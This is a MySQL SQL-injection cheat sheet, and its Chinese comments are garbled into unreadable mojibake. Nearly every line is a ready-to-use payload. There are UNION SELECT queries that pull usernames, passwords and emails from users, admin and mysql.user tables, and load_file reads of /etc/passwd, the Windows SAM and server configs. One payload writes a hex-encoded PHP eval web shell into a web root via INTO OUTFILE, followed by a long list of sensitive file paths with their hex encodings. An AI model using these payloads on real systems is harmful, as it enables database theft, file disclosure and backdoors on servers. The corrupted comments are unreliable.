Mysql sqlinjection code
Mysql sqlinjection code
# %23 -- /* /**/ ע
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
and+(select+count(*)+from+mysql.user)>0--жǷܶȡMYSQL
CONCAT_WS(CHAR(32,58,32),user(),database(),version()) û ݿ MYSQL汾
union+select+1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7--
union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*ȡusersû email Ϣ
unhex(hex(@@version)) unhexʽ鿴汾
union all select 1,unhex(hex(@@version)),3/*
convert(@@version using latin1) latin ʽ鿴汾
union+all+select+1,convert(@@version using latin1),3--
CONVERT(user() USING utf8)
union+all+select+1,CONVERT(user() USING utf8),3--latinʽ鿴û
and+1=2+union+select+1,passw,3+from+admin+from+mysql.user-- ȡMYSQLʻϢ
union+all+select+1,concat(user,0x3a,password),3+from+mysql.user-- ȡMYSQLʻϢ
union+select+1,concat_ws(0x3a,username,password),3+FROM+ADMIN--ȡadmin username password 0x3a Ϊ ð
union+all+select+1,concat(username,0x3a,password),3+from+admin--
union+all+select+1,concat(username,char(58),password),3+from admin--
UNION+SELECT+1,2,3,4,load_file(0x2F6574632F706173737764),6--ͨload_fileȡļ
UNION+SELECT+1,2,3,4,replace(load_file(0x2F6574632F706173737764),0x3c,0x20),6--ͨreplaceȫʾ
union+select+1,2,3,char(0x3C3F706870206576616C28245F504F53545B39305D3F3B3E),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'--webĿ¼дһ仰ľ
<?php+eval($_POST?;> Ϊ16Ʊһ仰ԭ
union+select+1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'-- PHPijͼƬϴ֮վͨinto outfile дwebĿ¼
òѯ
1:system_user() ϵͳû
2:user() û
3:current_userǰû
4:session_user()ݿû
5:database() ݿ
6:version() MYSQLݿ汾@@version
7:load_file() MYSQLȡļĺ
8:@@datadir ȡݿ·
9:@@basedir MYSQL װ·
10:@@version_compile_os ϵͳ
WINDOWS:
c:/boot.ini //鿴ϵͳ汾 0x633A2F626F6F742E696E690D0A
c:/windows/php.ini //phpϢ 0x633A2F77696E646F77732F7068702E696E69
c:/windows/my.ini //MYSQLļ¼Ա½MYSQLû0x633A2F77696E646F77732F6D792E696E69
c:/winnt/php.ini 0x633A2F77696E6E742F7068702E696E69
c:/winnt/my.ini 0x633A2F77696E6E742F6D792E696E69
c:\mysql\data\mysql\user.MYD//洢mysql.userеݿ0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini//洢վ·
0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69
c:\Program Files\Serv-U\ServUDaemon.ini 0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69
c:\windows\system32\inetsrv\MetaBase.xml//IISļ
c:\windows\repair\sam//洢WINDOWSϵͳΰװ
c:\Program Files\ Serv-U\ServUAdmin.exe//6.0汾ǰserv-uԱ洢ڴ
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cifļ
//洢pcAnywhereĵ½
c:\Program Files\Apache Group\Apache\conf \httpd.conf C:\apache\conf \httpd.conf //鿴 WINDOWSϵͳapacheļ
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66
c:/Resin-3.0.14/conf/resin.conf //鿴jspվ resinļϢ.0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66
c:/Resin/conf/resin.conf0x633A2F526573696E2F636F6E662F726573696E2E636F6E66
/usr/local/resin/conf/resin.conf 鿴linuxϵͳõJSP0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66
d:\APACHE\Apache2\conf\httpd.conf0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66
C:\Program Files\mysql\my.ini0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69
c:\windows\system32\inetsrv\MetaBase.xml 鿴IIS 0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C
C:\mysql\data\mysql\user.MYD MYSQLϵͳеû0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
LUNIX/UNIX:
/etc/passwd0x2F6574632F706173737764
/usr/local/app/apache2/conf/httpd.conf //apache2ȱʡļ0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //վ0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/usr/local/app/php5/lib/php.ini //PHP 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
/etc/sysconfig/iptables //еõǽ0x2F6574632F737973636F6E6669672F69707461626C657320
/etc/httpd/conf/httpd.conf // apacheļ 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
/etc/rsyncd.conf //ͬļ 0x2F6574632F7273796E63642E636F6E66
/etc/my.cnf //mysqlļ 0x2F6574632F6D792E636E66
/etc/redhat-release //ϵͳ汾 0x2F6574632F7265646861742D72656C65617365
/etc/issue 0x2F6574632F6973737565
/etc/issue.net 0x2F6574632F69737375652E6E6574
/usr/local/app/php5/lib/php.ini //PHP0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //վ 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/etc/httpd/conf/httpd.conf/usr/local/apche/conf/httpd.conf 鿴linux APACHEļ0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66
/usr/local/resin-3.0.22/conf/resin.conf3.0.22RESINļ鿴0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66
/usr/local/resin-pro-3.0.22/conf/resin.conf ͬ 0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE鿴
0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/etc/sysconfig/iptables 鿴ǽ 0x2F6574632F737973636F6E6669672F69707461626C6573
load_file(char(47))гFreeBSD,SunosϵͳĿ¼
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
Dz鿴һPHPļȫʾ.Щʱ滻һЩַ, "<" 滻"ո" صҳ.鿴.
ҳ:
[1]